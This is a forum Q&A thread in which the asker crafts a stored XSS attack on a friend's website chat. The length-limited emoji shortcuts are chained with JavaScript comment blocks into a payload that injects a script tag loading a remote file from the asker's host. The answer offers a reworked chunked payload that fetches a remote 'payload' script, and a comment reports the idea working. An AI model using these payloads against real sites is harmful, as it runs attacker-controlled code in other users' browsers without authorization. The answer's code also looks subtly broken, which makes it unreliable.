# Run JavaScript code on length-limited input

Tags: javascript, html, xss

I found an XSS on my friend's website chat.

I have a multiline TextBox, I can upload small icons and I can use them like emojis. In order to use these emojis, I have to name those emojis with a shortcut, for example: `/haha`, `/rofl` and others.
These shortcuts can be modified with anything, but with a length of 32 characters. No character is sanitized when I input shortcuts.

this is the HTML code:

```
<div class="message"><span class="timestamp">7:09:43 PM - </span><span class="username"><span class="level1">fooUser</span></span><span>: </span><span><img src="https://path/to/emojiFile" alt="/haha" title="/haha" data-emoji="emojiFile" border="0"></span></div>
```

`/haha` can even be `<script>alert(1)</script>`, but it has to be 32 characters long.

So I thought I can create a payload for these, but I thought to split it up for each emoji.

What I'm doing is this:

```
var x=/*
*/document.createElement/*
*/("script");x.src=/*
*/"//mywebs"+/*
*/"ite.com/a.js",/*
*/document.head.appendChild/*
*/(x);
```

and so I inject this HTML code:

```
"><script>var x=/*
*/document.createElement/*
*/("script");x.src=/*
*/"//mywebs"+/*
*/"ite.com/a.js",/*
*/document.head.appendChild/*
*/(x);</script><!--
```

so each line corrisponds to an emoji. This is an hacky-tricky way to bypass length limit.

This is the abstract concept:

```
emoji1=<script><then begin comment block>

emoji2=<end comment block>alert("Hello World")<start comment block>

emoji3=<end comment block><script>
```

This is the result:

```
<div class="message"><span class="timestamp">07:24:26 PM - </span><span class="username"><span class="level1">fooUser</span></span><span>: </span><span><img src="https://path/to/emojiFile" alt="" border="0"><script>var x=/*" title=""><script>var x=/*" data-emoji="emojiFile" /><img border="0" src="https://path/to/emojiFile" alt="*/document.createElement/*" title="*/document.createElement/*" data-emoji="emojiFile" /><img border="0" src="https://path/to/emojiFile" alt="*/("script");x.src=/*" title="*/("script");x.src=/*" data-emoji="emojiFile" /><img border="0" src="https://path/to/emojiFile" alt="*/"//mywebs"+/*" title="*/"//mywebs"+/*" data-emoji="emojiFile" /><img border="0" src="https://path/to/emojiFile" alt="*/"ite.com/a.js",/*" title="*/"ite.com/a.js",/*" data-emoji="emojiFile" /><img border="0" src="https://path/to/emojiFile" alt="*/document.head.appendChild/*" title="*/document.head.appendChild/*" data-emoji="emojiFile" /><img border="0" src="https://path/to/emojiFile" alt="*/(x);</script><!--" title="*/(x);</script><!--" data-emoji="emojiFile" />--></span></div>
```

basically non-sanitized-HTML input (where I put my payload) is duplicated under `alt` and `title` and there is maybe a sort of ambiguity when I put comment blocks.

How can I solve?

Answer (score 1):

Break the script up into 32 character chunks that can be repeated twice.

```
"><script>/*
*/p=document/*
*/q='http://mywebsite.com/'/*
*/r='mysubfolder/js/'/*
*/s='payloadfolder/a.js'/*
*/t=head/*
*/u=p.t/*
*/x=p.createElement('script')/*
*/x.src=p+q+s/*
*/u.appendChild(x)</script><!--
```

Comment: The concept of breaking the script up into 32 characters chunks that can be repeated twice works. I modified something to make it work, but now it works if I run the JS with browser console, and not when I try to trigger it with XSS. I think firefox blocks something.